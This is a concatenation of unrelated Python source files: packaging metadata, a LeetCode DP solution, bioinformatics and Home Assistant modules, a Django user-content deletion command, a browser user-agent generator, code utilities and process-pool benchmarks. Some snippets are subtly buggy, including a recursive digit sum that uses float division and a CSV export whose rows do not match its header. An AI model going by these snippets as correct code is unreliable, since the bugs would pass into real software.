'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Distributed Computing',
'Topic :: System :: Systems Administration',
],
)
|
# -*- coding: utf-8 -*-
# @Author : LG
"""
执行用时:40 ms, 在所有 Python3 提交中击败了90.60% 的用户
内存消耗:13.7 MB, 在所有 Python3 提交中击败了68.93% 的用户
解题思路:
动态规划
例: 1,17,5,10,13,15,10,5,16,8
1 17 5 10 13 15 10 5 16 8
↗ 0 ↗ 1 ↘ → 1 ↗ 3 ↗ 3 ↗ 3 ↘ → 3 ↘ → 3 ↗ 5 ↘ → 5
↘ 0 ↗ → 0 ↘ 2 ↗ → 2 ↗ → 2 ↗ → 2 ↘ 4 ↘ 4 ↗ → 4 ↘ 6
n 1 2 3 4 4 4 5 5 6 7
使用dp[0][i]保存上升的结果,使用dp[1][i]表示下降的结果
nums[i] > nums[i+1]时,上升
dp[0][i] = dp[1][i-1] + 1 当前数值在上一个下降时的数值基础上+1
dp[1][i] = dp[1][i-1] 当前数字下降等于前一个下降时的数值,保持不变
nums[i] < nums[i+1]时,下降
dp[0][i] = dp[0][i-1] 当前数值上升等于前一个数上升时的数值,保持不变
dp[1][i] = dp[0][i-1] + 1 当前数字下降在前一个数上升的数值基础上+1
nums[i] == nums[i+1]时,等于
dp[0][i] = dp[0][i - 1] 上升下降均保持不变
dp[1][i] = dp[1][i - 1]
"""
class Solution:
def wiggleMaxLength(self, nums: List[int]) -> int:
n = len(nums)
if n == 0:
return 0
dp = [[0 for _ in range(n)] for _ in range(2)]
for i in range(1,n):
if nums[i] > nums[i-1]:
dp[1][i] = dp[1][i - 1]
dp[0][i] = dp[1][i - 1] + 1
elif nums[i] < nums[i-1]:
dp[1][i] = dp[0][i - 1] + 1
dp[0][i] = dp[0][i - 1]
else:
dp[0][i] = dp[0][i - 1]
dp[1][i] = dp[1][i - 1]
return max(dp[0][-1], dp[1][-1])+1 |
#!/usr/bin/env python
import os, logging
# shut some mouths
logging.getLogger("botocore").setLevel(logging.ERROR)
logging.getLogger("boto").setLevel(logging.ERROR)
logging.getLogger("s3transfer").setLevel(logging.ERROR)
logging.getLogger("urllib3").setLevel(logging.ERROR)
import config, biothings
from biothings.utils.version import set_versions
app_folder,_src = os.path.split(os.path.split(os.path.abspath(__file__))[0])
set_versions(config,app_folder)
biothings.config_for_app(config)
logging = config.logger
from biothings.hub import HubServer
import hub.dataload.sources
server = HubServer(hub.dataload.sources,name="BioThings Studio")
if __name__ == "__main__":
# vanilla or as a launcher of an API
from optparse import OptionParser
import os, sys, glob, re
parser = OptionParser()
parser.add_option("-a","--api-folder",help="API folder to run", dest="api_folder")
(options, args) = parser.parse_args()
if options.api_folder:
api_folder = os.path.abspath(options.api_folder)
logging.info("Lauching server from API located in: %s" % api_folder)
origwd = os.path.abspath(os.path.curdir)
# assuming a bin/hub.py module in this folder
os.chdir(api_folder)
assert "bin" in os.listdir(), "Can't find 'bin' folder containing hub.py"
scripts = glob.glob(os.path.join("bin","*.py"))
print(scripts)
startup = None
if len(scripts) == 1:
startup = scripts.pop()
else:
if "bin/hub.py" in scripts:
startup = scripts[scripts.index("bin/hub.py")]
else:
logging.error("Found more than one startup scripts, none of them named hub.py, " + \
"don't know which to choose: %s" % scripts)
sys.exit(1)
logging.info("Found startup script '%s'" % startup)
strmod = re.sub(".py$","",startup).replace("/",".")
import importlib
mod = importlib.import_module(strmod)
from biothings.hub import HubServer
# try to locate a hub server instance
for name in dir(mod):
server = getattr(mod,name)
if issubclass(server.__class__,HubServer):
logging.info("Found hub server: %s" % server)
# replace sources, dynamic discovery
if os.path.exists("hub/dataload/sources"):
server.source_list = "hub/dataload/sources"
logging.info("Auto-discovering sources in 'hub/dataload/sources'")
else:
logging.warning("Couldn't locate sources folder (expecting 'hub/dataload/sources'), keep those defined by the API")
break
else:
logging.info("Runing vanilla studio")
logging.info("Hub DB backend: %s" % biothings.config.HUB_DB_BACKEND)
logging.info("Hub database: %s" % biothings.config.DATA_HUB_DB_DATABASE)
server.start()
|
# coding=utf-8
import csv as csv
from pipelines.auxmod.auxiliary import read_chromsizes, open_comp, check_bounds
def process_ucsc_cgi(inputfile, outputfile, boundcheck, nprefix):
"""
:param inputfile:
:param outputfile:
:param boundcheck:
:param nprefix:
:return:
"""
bounds = read_chromsizes(boundcheck)
opn, mode, conv = open_comp(inputfile, True)
regions = []
bchk = check_bounds
with opn(inputfile, mode) as infile:
for line in infile:
line = conv(line)
if not line or line.startswith('#'):
continue
c, s, e = line.split()[1:4]
stat = bchk(c, s, e, bounds, inputfile)
if not stat:
# chromosome not in check file, otherwise raises
continue
regions.append(line.strip().split('\t')[1:])
assert regions, 'No regions read from file {}'.format(inputfile)
regions = sorted(regions, key=lambda x: (x[0], int(x[1]), int(x[2])))
rowbuffer = []
for idx, reg in enumerate(regions, start=1):
reg[3] = '{}_{}'.format(nprefix, idx)
rowbuffer.append(reg)
opn, mode, conv = open_comp(outputfile, False)
cgi_header = ['#chrom', 'start', 'end', 'name', 'length',
'cpgNum', 'gcNum', 'perCpg', 'perGc', 'obsExp']
with opn(outputfile, mode) as outf:
writer = csv.writer(outf, delimiter='\t')
writer.writerow(cgi_header)
for row in rowbuffer:
writer.writerow(row)
return outputfile
|
# coding=utf-8
import pytest
from cla.learn.classifier import TraditionalClassifier
@pytest.fixture(scope="module")
def setup_classifier():
classifier = TraditionalClassifier(vector_model_path="cla/res/test/model.bin",
training_data_path="cla/res/test/labeled_train.txt")
return classifier
def test_traditional_classifier(setup_classifier):
result = setup_classifier.classify([[u"这样", u"的", u"好事", u"应该", u"多", u"搞"],
[u"小偷", u"太", u"坏"]])
print result
assert result.__sizeof__() > 0
assert result[0] > 0
assert result[1] < 0
def test_traditional_classifier_accuracy(setup_classifier):
result = setup_classifier.test_with(test_data_path="cla/res/test/labeled_test.txt")
print result
assert result > 0.5
|
import csv
from pymongo import MongoClient
try:
from credentials import MONGOLAB_URL
except ImportError:
MONGOLAB_URL = 'mongodb://localhost:27017/naturalisations'
def export_csv(series_id):
dbclient = MongoClient(MONGOLAB_URL)
db = dbclient.get_default_database()
with open('data/{}.csv'.format(series_id), 'wb') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow([
'barcode',
'series',
'control_symbol',
'title',
'start_date',
'end_date',
'access_status',
'location',
'digitised_status',
'digitised_pages'
])
items = db.items.find({'series': series_id})
# print len(list(items))
for index, item in enumerate(items):
csv_writer.writerow([
index,
item['identifier'],
item['series'],
item['control_symbol'],
item['title'].replace('\n', ' ').replace('\r', '').replace(' ', ' '),
item['contents_dates']['start_date'],
item['contents_dates']['end_date'],
item['access_status'],
item['location'],
item['digitised_status'],
item['digitised_pages']
])
|
#
# Count of sum of digits using recursion
#
def sum_of_digits(count):
if(count<=0):
return 0
final = (count%10) + sum_of_digits(count/10);
return final
count = 1234
print(sum_of_digits(count))
|
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.const import (CONF_NAME)
import homeassistant.helpers.config_validation as cv
from .api import P2000Api
"""Start the logger"""
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "p2000"
CONF_GEMEENTEN = "gemeenten"
CONF_CAPCODES = "capcodes"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_GEMEENTEN): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_CAPCODES): vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Setup the sensor platform."""
name = config.get(CONF_NAME)
filter = {
"gemeenten": config.get(CONF_GEMEENTEN),
"capcodes": config.get(CONF_CAPCODES)
}
_LOGGER.info(filter)
api = P2000Api()
add_entities([P2000Sensor(api, name, filter)])
class P2000Sensor(SensorEntity):
"""Representation of a Sensor."""
def __init__(self, api, name, filter):
"""Initialize the sensor."""
self.api = api
self.attributes = {}
self.filter = filter
self._name = name
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def extra_state_attributes(self):
"""Return the state attributes of the monitored installation."""
attributes = self.attributes
attributes['icon'] = 'mdi:fire-truck'
return attributes
def update(self):
"""Fetch new state data for the sensor.
This is the only method that should fetch new data for Home Assistant.
"""
data = self.api.get_data(self.filter)
if (data == None):
return
self.attributes = data
self._state = data["id"]
|
from .soc_psql import PSQLConfig
from .soc_psql_forward import PSQLForwardConfig
from .soc_preprocessed_seq import PreprocessedSeqConfig
from .soc_preprocessed_forward import PreprocessedForwardConfig
from .soc_preprocessed_text_forward import PreprocessedTextForwardConfig
from .soc_psql_text_seq import PSQLTextConfig
from .soc_psql_text_forward import PSQLTextForwardConfig
from .soc_file_text_seq import FileTextConfig
from .soc_file_text_forward import FileTextForwardConfig
from .soc_psql_seq import SocPSQLSeqDataset
from .soc_psql_seq import SocPSQLSeqSAToSDataset
from .soc_psql_seq import SocPSQLSeqSAToSADataset
from .soc_psql_forward import SocPSQLForwardSAToSADataset
from .soc_psql_forward import SocPSQLForwardSAToSAPolicyDataset
from .soc_preprocessed_seq import SocPreprocessedSeqSAToSDataset
from .soc_preprocessed_seq import SocPreprocessedSeqSAToSADataset
from .soc_preprocessed_seq import SocPreprocessedSeqSAToSAPolicyDataset
from .soc_preprocessed_forward import SocPreprocessedForwardSAToSADataset
from .soc_preprocessed_forward import SocPreprocessedForwardSAToSAPolicyDataset
from .soc_preprocessed_forward import SocLazyPreprocessedForwardSAToSADataset
from .soc_preprocessed_forward import SocLazyPreprocessedForwardSAToSAPolicyDataset
from .soc_psql_text_seq import SocPSQLTextBertSeqDataset
from .soc_psql_text_forward import SocPSQLTextBertForwardSAToSADataset
from .soc_psql_text_forward import SocPSQLTextBertForwardSAToSAPolicyDataset
from .soc_file_seq import SocFileSeqDataset
from .soc_file_text_seq import SocFileTextBertSeqDataset
from .soc_file_text_forward import SocFileTextBertForwardSAToSAPolicyDataset
from .soc_file_text_forward import SocFileTextBertHumanTradeForwardSAToSAPolicyDataset
from .soc_file_text_forward import SocFileTextBertTradeForwardSAToSAPolicyDataset
from .soc_preprocessed_text_forward import SocPreprocessedTextBertForwardSAToSADataset
from .soc_preprocessed_text_forward import SocPreprocessedTextBertForwardSAToSAPolicyDataset
# yapf: disable
__all__ = [
# Configurations
'PSQLConfig',
'PSQLForwardConfig',
'PreprocessedSeqConfig',
'PreprocessedForwardConfig',
'PSQLTextConfig',
'PSQLTextForwardConfig',
'PreprocessedTextForwardConfig',
'FileTextConfig',
'FileTextForwardConfig',
# Soc Datasets
'SocPSQLSeqDataset',
'SocPSQLSeqSAToSDataset',
'SocPSQLSeqSAToSADataset',
'SocPSQLForwardSAToSADataset',
'SocPSQLForwardSAToSAPolicyDataset',
'SocPreprocessedSeqSAToSDataset',
'SocPreprocessedSeqSAToSADataset',
'SocPreprocessedSeqSAToSAPolicyDataset',
'SocPreprocessedForwardSAToSADataset',
'SocPreprocessedForwardSAToSAPolicyDataset',
'SocLazyPreprocessedForwardSAToSADataset',
'SocLazyPreprocessedForwardSAToSAPolicyDataset',
# Soc Dataset with text
'SocPSQLTextBertSeqDataset',
'SocPSQLTextBertForwardSAToSADataset',
'SocPSQLTextBertForwardSAToSAPolicyDataset',
'SocFileSeqDataset',
'SocFileTextBertSeqDataset',
'SocFileTextBertForwardSAToSAPolicyDataset',
'SocFileTextBertHumanTradeForwardSAToSAPolicyDataset',
'SocFileTextBertTradeForwardSAToSAPolicyDataset',
'SocPreprocessedTextBertForwardSAToSADataset',
'SocPreprocessedTextBertForwardSAToSAPolicyDataset',
]
# yapf: enable
def make_dataset(config):
if config.name in __all__:
dataset_class = globals()[config.name]
dataset = dataset_class(config)
return dataset
else:
raise Exception('The dataset name {} does not exist'.format(config.name))
def get_dataset_class(config):
if config.name in __all__:
dataset_class = globals()[config.name]
return dataset_class
else:
raise Exception('The dataset name {} does not exist'.format(config.name))
def get_datasets_list():
return __all__
|
import django
__version__ = '3.10.0'
if django.VERSION < (3, 2):
default_app_config = 'cms.apps.CMSConfig'
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
# from src.self import SelfEnum as self_enum
import gen_browser_header.self.SelfEnum as self_enum
import gen_browser_header.helper.Helper as helper
import datetime
CHROME_MAX_RELEASE_YEAR = datetime.date.today().year - 2008 + 1
class GbhSetting(object):
# 如果是模拟windows下浏览器产生的user-agent,那么需要模拟那些windows版本
# 6.0 = Vista 6.1=win7 6.2=win8 6.3=win8.1 10 = win10
WIN_VER = ['Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2',
'Windows NT 6.3', 'Windows NT 10.0']
# _proxy_ip: 默认None。设置必须是list,用来生成代理,连接到无法直连的网站
# _firefox_header_no_ua: dict。用来生成header的模板,填入ua,即可生成header
# _browser_type: set。产生哪些浏览器的ua,当前支持firefox和chrome
# _firefox_ver: dict。产生的ua对应的ff的版本,有2个key,min和max
# _chrome_type: set。chrome有4类型,stable/dev/Canary/beta,产生的ua是哪种类型
# _chrome_max_release_year: int。产生的chrome最远是几年前(太老的版本不使用
# _os_type: set。哪种操作系统上生成的ua。当前支持win32和win64
__slots__ = ('_proxy_ip', '_firefox_header_no_ua', '_chrome_header_no_ua',
'_browser_type', '_firefox_ver', '_chrome_type',
'_chrome_max_release_year', '_os_type')
def __init__(self):
self._proxy_ip = None
self._firefox_header_no_ua = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, br',
'Accept-Encoding': '*', # 某些网站,及时可以使用br,也需要设置成*,否则返回乱码
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'keep-alive'}
self._chrome_header_no_ua = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
# 'Accept-Encoding': 'gzip, deflate',
'Accept-Encoding': '*', # 某些网站,及时可以使用br,也需要设置成*,否则返回乱码
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive'}
# self._proxies = None
self._browser_type = {self_enum.BrowserType.FireFox}
self._firefox_ver = {'min': 64, 'max': 75}
self._chrome_type = {self_enum.ChromeType.Stable}
self._chrome_max_release_year = 2
self._os_type = {self_enum.OsType.Win64}
@property
def proxies(self):
if self._proxy_ip is None:
# self._proxies = None
return None
else:
# self._proxies = [{'http:%s' % ip, 'https:%s' % ip} for ip in self._proxy_ip]
return [{'http':'%s' % ip, 'https':'%s' % ip} for ip in self._proxy_ip]
# return self._proxies
@property
def firefox_header_no_ua(self):
return self._firefox_header_no_ua
@firefox_header_no_ua.setter
def firefox_header_no_ua(self, value):
# 偷懒,不检查格式了
self._firefox_header_no_ua = value
@property
def chrome_header_no_ua(self):
return self._chrome_header_no_ua
@chrome_header_no_ua.setter
def chrome_header_no_ua(self, value):
# 偷懒,不检查格式了
self._chrome_header_no_ua = value
@property
def browser_type(self):
return self._browser_type
@browser_type.setter
def browser_type(self, value):
r = helper.enum_set_check(value, self_enum.BrowserType)
if r is None:
return
else:
self._browser_type = r
# # value是set
# if not helper.match_expect_type(value, 'set'):
# # print('not set')
# return
# # value中每个值是合法的browser_type
# if not helper.all_values_preDefined(values=value,
# defined_enum=self_enum.BrowserType):
# # print('not valid')
# return
# # value中有all,则只设置all
# if self_enum.BrowserType.All in value:
# self._browser_type = {self_enum.BrowserType.Chrome,
# self_enum.BrowserType.FireFox}
# return
# # print(value)
# self._browser_type = value
@property
def proxy_ip(self):
return self._proxy_ip
# chrome的版本需要连接到https://www.chromedownloads.net/来读取,如果直接连接不行,那么会采用proxy_ip
# 中的代理进行尝试
@proxy_ip.setter
def proxy_ip(self, value):
self._proxy_ip = value
@property
def firefox_ver(self):
return self._firefox_ver
@firefox_ver.setter
def firefox_ver(self, value):
# 如果格式不符合,保持原来的值,不做任何修改
if not helper.match_expect_type(value, 'dict'):
return
if 'min' in value and helper.match_expect_type(value['min'], 'int'):
self._firefox_ver['min'] = value['min']
# 使用range进行list生成时,会会忽略最大值,所以需要+1
# [range(74, 75)] => [74]
if 'max' in value and helper.match_expect_type(value['max'], 'int'):
self._firefox_ver['max'] = value['max']+1
@property
def chrome_type(self):
return self._chrome_type
@chrome_type.setter
def chrome_type(self, value):
r = helper.enum_set_check(value, self_enum.ChromeType)
if r is None:
return
else:
self._chrome_type = r
# # value是set
# if not helper.match_expect_type(value, 'set'):
# # print('not set')
# return
# # value中每个值是合法的chrome_type
# if not helper.all_values_preDefined(values=value,
# defined_enum=self_enum.ChromeType):
# # print('not valid')
# return
# # value中有all,则只设置all
# if self_enum.ChromeType.All in value:
# self._chrome_type = {self_enum.ChromeType.Stable,
# self_enum.ChromeType.Beta,
# self_enum.ChromeType.Canary,
# self_enum.ChromeType.Dev}
# return
#
# self._chrome_type = value
@property
def chrome_max_release_year(self):
return self._chrome_max_release_year
@chrome_max_release_year.setter
def chrome_max_release_year(self, value):
# 是否为整数
if not helper.match_expect_type(value, 'int'):
return
# 是否大于0
if value < 0:
return
# 是否小于当前年-2008
if CHROME_MAX_RELEASE_YEAR < value:
return
self._chrome_max_release_year = value
@property
def os_type(self):
return self._os_type
@os_type.setter
def os_type(self, value):
r = helper.enum_set_check(value, self_enum.OsType)
if r is None:
return
else:
self._os_type = r
# # 必须是set,否则直接返回,保留原始设置
# if not helper.match_expect_type(value, 'set'):
# return
# # set中每个值都是self_enum.OsType中定义过的, 否则直接返回,保留原始设置
# if not helper.all_values_preDefined(values=value,
# defined_enum=self_enum.OsType):
# return
# # 如果有self_enum.OsType.ALL,则只保留ALL,其他删除
# if self_enum.OsType.All in value:
# self._os_type = {self_enum.OsType.Win32, self_enum.OsType.Win64}
# return
#
# self._os_type = value
if __name__ == '__main__':
# print(GbhSetting['WIN_VER'])
st = GbhSetting()
# st.browser_type = {self_enum.BrowserType.All}
# print(st.browser_type)
# st.chrome_type = {self_enum.ChromeType.All}
# print(st.chrome_type)
# st.chrome_type = {self_enum.ChromeType.Stable}
# print(st.chrome_type)
# st.os_type = {self_enum.OsType.All}
# print(st.os_type)
# st.os_type = {self_enum.OsType.Win32}
# print(st.os_type)
# print(st.proxy_ip)
# print(st.proxies)
# st.firefox_ver = {'min':72,'max':75}
# print(st.firefox_ver)
#
# print(st.WIN_VER)
# print(st.HEADER)
|
from django.core.management.base import BaseCommand, CommandError
from django_comments.models import Comment
from molo.profiles.models import UserProfile, SecurityAnswer
from molo.forms.models import MoloFormSubmission
from wagtail.core.models import Site
class Command(BaseCommand):
help = ('Accepts site ids and removes associated users and '
'user-generated content')
commit = False
comment_count = 0
submissions_count = 0
sec_answer_count = 0
def add_arguments(self, parser):
parser.add_argument('site_ids', nargs='+', type=int)
parser.add_argument(
'--commit',
action='store_true',
help='Commit the changes rather than just showing them.',
)
def handle(self, *args, **options):
if options['commit']:
self.commit = True
for site_id in options['site_ids']:
try:
site = Site.objects.get(pk=site_id)
except Site.DoesNotExist:
raise CommandError('Site "%s" does not exist' % site_id)
profiles = self.get_user_profiles(site)
self.stdout.write(
'Found %s profiles for site %s' % (profiles.count(), site_id))
staff_count = 0
for profile in profiles.iterator():
# Don't delete anything for staff members
if profile.user.is_staff or profile.user.is_superuser:
staff_count += 1
continue
self.remove_comments(profile.user)
self.remove_form_submissions(profile.user)
self.remove_security_question_answers(profile)
if self.commit:
user = profile.user
profile.delete()
user.delete()
self.stdout.write('Found %s staff profiles' % staff_count)
self.stdout.write('Found %s comments' % self.comment_count)
self.stdout.write(
'Found %s form submissions' % self.submissions_count)
self.stdout.write(
'Found %s security question answers' % self.sec_answer_count)
if self.commit:
self.stdout.write('All (non-staff) content deleted.')
def get_user_profiles(self, site):
profiles = UserProfile.objects.filter(site=site)
return profiles
def remove_comments(self, user):
comments = Comment.objects.filter(user=user)
self.comment_count += comments.count()
if self.commit:
comments.delete()
def remove_form_submissions(self, user):
submissions = MoloFormSubmission.objects.filter(user=user)
self.submissions_count += submissions.count()
if self.commit:
submissions.delete()
def remove_security_question_answers(self, profile):
answers = SecurityAnswer.objects.filter(user=profile)
self.sec_answer_count += answers.count()
if self.commit:
answers.delete()
|
import asyncio
import pytest
@pytest.fixture
def queue() -> asyncio.Queue:
return asyncio.Queue()
|
import random
from abc import ABC, abstractmethod
from typing import Sequence, List
from .action import Action
from .states.game_state import GameState
class Agent(ABC):
@abstractmethod
def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
raise NotImplementedError
def on_action_applied(self, action: Action, new_state: GameState):
pass
class RandomAgent(Agent):
def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
return random.choice(possible_actions)
class RecordedAgent(Agent):
actions: List[Action]
def __init__(self, actions: List[Action]):
super().__init__()
self.actions = actions
def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
return self.actions.pop(0)
class ConsoleAgent(Agent):
def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
for i, action in enumerate(possible_actions):
print(f"{i}: {action}")
while True:
try:
index = int(input())
if 0 <= index < len(possible_actions):
return possible_actions[index]
except ValueError as e:
print(e)
|
import os
import shutil
import re
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass
from typing import List
from loguru import logger
class FileStructure:
def __init__(self, infile: str, klass: str, indent=" ") -> None:
self.infile = infile
with open(infile, "r") as f:
self.lines = f.readlines()
# detect where the class starts
self.klass_start = 0
for i, line in enumerate(self.lines):
if line.startswith(f"class {klass}"):
self.klass_start = i
if line.find("(") != -1 and line.find(")") == -1:
# class is not closed
while self.lines[self.klass_start].find(")") == -1:
self.klass_start += 1
self.klass_start += 1
break
self.klass_end = len(self.lines)
for i in range(self.klass_start, len(self.lines)):
if self.lines[i].strip() == "" or self.lines[i].startswith(indent):
continue
self.klass_end = i
break
self.funcs = []
for i in range(self.klass_start, self.klass_end):
line = self.lines[i]
if line.startswith(f"{indent}def "):
# this is where the function begin, look before and after
func_start = i
while True:
if self.lines[func_start - 1].strip() == "" or not (
self.lines[func_start - 1].startswith(indent)
and not self.lines[func_start - 1].startswith(indent * 2)
):
break
func_start -= 1
# detect if the function is not closed yet
if re.match(rf"{indent}def [^(]+\([^)]*\n", line) is not None:
# the function is not closed yet
func_end = i + 1
while True:
if self.lines[func_end].find(")") != -1:
func_end += 1
break
func_end += 1
else:
func_end = i + 1
while func_end < len(self.lines):
if (
not self.lines[func_end].startswith(f"{indent}{indent}")
and self.lines[func_end].strip() != ""
):
break
func_end += 1
self.funcs.append(
{
"name": re.match(rf"{indent}def +([^(]+)\(", line).group(1),
"start": func_start,
"end": func_end,
}
)
# make sure it has some functions
assert len(self.funcs) > 0
# adjust the start & end of the class
self.klass_start = min([x["start"] for x in self.funcs]) - 1
self.klass_end = max([x["end"] for x in self.funcs])
def reorder_funcs(self, new_order: List[str]) -> None:
# current implementation works only for functions with empty lines between them
used_lines = set()
for func in self.funcs:
for i in range(func["start"], func["end"]):
used_lines.add(i)
for i in range(self.klass_start + 1, self.klass_end):
if i not in used_lines:
assert self.lines[i].strip() == "", f"Line {i}: {self.lines[i]}"
new_lines = self.lines[: self.klass_start + 1]
funcs = {x["name"]: x for x in self.funcs}
if set(funcs.keys()) != set(new_order):
logger.error(
"Missing functions: {}", set(funcs.keys()).difference(new_order)
)
logger.error("Extra functions: {}", set(new_order).difference(funcs.keys()))
raise ValueError("Invalid order")
for func in new_order:
new_lines += self.lines[funcs[func]["start"] : funcs[func]["end"]]
new_lines.append("\n")
new_lines += self.lines[self.klass_end :]
backup = f"{self.infile}.{datetime.now().isoformat()}"
assert not os.path.exists(backup), backup
shutil.copyfile(self.infile, backup)
with open(self.infile, "w") as f:
for line in new_lines:
f.write(line)
def sync_with(self, fs: "FileStructure") -> None:
"""Make your functions following the same order as in the other file.
The functions that are not in the other file are put at the bottom"""
old_order = [x["name"] for x in self.funcs]
new_order = []
if self.has_func("__init__") and not fs.has_func("__init__"):
new_order.append("__init__")
old_order.pop(old_order.index("__init__"))
for func in fs.funcs:
if func["name"] not in old_order:
continue
new_order.append(func["name"])
old_order.pop(old_order.index(func["name"]))
new_order += old_order
assert len(new_order) == len(self.funcs)
self.reorder_funcs(new_order)
def has_func(self, name: str):
return any(name == x["name"] for x in self.funcs)
if __name__ == "__main__":
fs = FileStructure("/workspace/sm-dev/graph/graph/interface.py", "IGraph")
fs2 = FileStructure(
"/workspace/sm-dev/graph/graph/retworkx/digraph.py", "_RetworkXDiGraph"
)
fs3 = FileStructure(
"/workspace/sm-dev/graph/graph/retworkx/str_digraph.py", "RetworkXStrDiGraph"
)
# fs2.sync_with(fs)
fs3.sync_with(fs)
# print(len(fs.funcs))
# print([f["name"] for f in fs.funcs])
# fs.reorder_funcs(
# [
# "num_nodes",
# "nodes",
# "iter_nodes",
# "filter_nodes",
# "iter_filter_nodes",
# "has_node",
# "get_node",
# "add_node",
# "remove_node",
# "update_node",
# "find_node",
# "degree",
# "in_degree",
# "out_degree",
# "successors",
# "predecessors",
# "num_edges",
# "edges",
# "iter_edges",
# "filter_edges",
# "iter_filter_edges",
# "has_edge",
# "get_edge",
# "add_edge",
# "update_edge",
# "remove_edge",
# "remove_edge_between_nodes",
# "remove_edges_between_nodes",
# "has_edge_between_nodes",
# "has_edges_between_nodes",
# "get_edge_between_nodes",
# "get_edges_between_nodes",
# "in_edges",
# "out_edges",
# "group_in_edges",
# "group_out_edges",
# "subgraph_from_edges",
# "subgraph_from_edge_triples",
# "copy",
# "check_integrity",
# ]
# )
# print([x["name"] for x in fs2.funcs])
|
__author__ = 'wanderknight'
__time__ = '2019/8/9 20:31'
from django.conf.urls import url
from ..views.oj import ClassgroupAPI
urlpatterns = [
url(r"^classgroups/?$", ClassgroupAPI.as_view(), name="classgroup_api"),
]
|
import sys
import time
import fastprocesspool_debug as fastprocesspool
from multiprocessing.pool import Pool
if sys.version_info[0] > 2:
from concurrent.futures import ProcessPoolExecutor
import zstd
import msgpack
class TestValues(object):
def __init__(self):
self.result = 0
self.worker = None
self.worker_gen = None
def worker_cb(self, data):
#print("worker_cb", data)
return data
def worker_gen_cb(self, data):
yield data
def failed_cb(self, exc):
print(exc)
def result_cb(self, result):
#print("result_cb", result)
self.result += result
def results_cb(self, results):
self.result += sum(results)
def result_future_cb(self, result):
self.result += result.result()
def map(self, data):
pool = fastprocesspool.Pool()
pool.map(self.worker, data)
pool.shutdown()
self.result = sum(pool.done)
def map_no_done(self, data):
pool = fastprocesspool.Pool()
pool.map(self.worker, data, False)
pool.shutdown()
def map_done_cb(self, data):
with fastprocesspool.Pool(done_callback = self.result_cb) as pool:
pool.map(self.worker, data)
def map_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
pool.map(self.worker, data)
pool.shutdown()
self.result = sum(pool.done)
def imap(self, data):
pool = fastprocesspool.Pool()
pool.imap(self.worker_gen, data)
pool.shutdown()
self.result = sum(pool.done)
def imap_done_cb(self, data):
with fastprocesspool.Pool(done_callback = self.result_cb) as pool:
pool.imap(self.worker_gen, data)
def imap_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
pool.imap(self.worker_gen, data)
pool.shutdown()
self.result = sum(pool.done)
def submit(self, data):
pool = fastprocesspool.Pool()
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
self.result = sum(pool.done)
def submit_pool_done_cb(self, data):
with fastprocesspool.Pool(done_callback = self.result_cb) as pool:
for value in data:
pool.submit(self.worker, value)
def submit_pool_failed_cb(self, data):
pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
for value in data:
pool.submit(self.worker, value)
pool.shutdown()
self.result = sum(pool.done)
def submit_done_cb(self, data):
with fastprocesspool.Pool() as pool:
for value in data:
pool.submit_done(self.worker, self.result_cb, value)
def Pool_map(self, data):
pool = Pool()
results = pool.map(self.worker, data)
pool.close()
pool.join()
self.result = sum(results)
def Pool_map_async_done_cb(self, data):
pool = Pool()
pool.map_async(self.worker, data, callback = self.results_cb)
pool.close()
pool.join()
def Pool_apply_async_done_cb(self, data):
pool = Pool()
for value in data:
pool.apply_async(self.worker, ( value, ), callback = self.result_cb)
pool.close()
pool.join()
def ProcessPoolExecutor_map(self, data):
pool = ProcessPoolExecutor()
results = pool.map(self.worker, data)
pool.shutdown()
self.result = sum(results)
def ProcessPoolExecutor_submit_done_cb(self, data):
pool = ProcessPoolExecutor()
for value in data:
future = pool.submit(self.worker, value)
future.add_done_callback(self.result_future_cb)
pool.shutdown()
def test(self, test_cb, data):
self.result = 0
self.worker = self.worker_cb
self.worker_gen = self.worker_gen_cb
t = time.time()
getattr(self, test_cb)(data)
print("%6.3f %12d %s" % (time.time() - t, self.result, test_cb))
def run(self, cnt):
print("\n%d values:" % cnt)
values = list(range(cnt))
self.result = 0
t = time.time()
for value in values:
self.result_cb(self.worker_cb(value))
print("%6.3f %12d single threaded" % (time.time() - t, self.result))
t = time.time()
self.result = sum([ self.worker_cb(value) for value in values ])
print("%6.3f %12d sum list" % (time.time() - t, self.result))
print("fastprocesspool:")
#self.test("map", values)
#self.test("map_no_done", values)
#self.test("map_done_cb", values)
#self.test("map_failed_cb", values)
#self.test("imap", values)
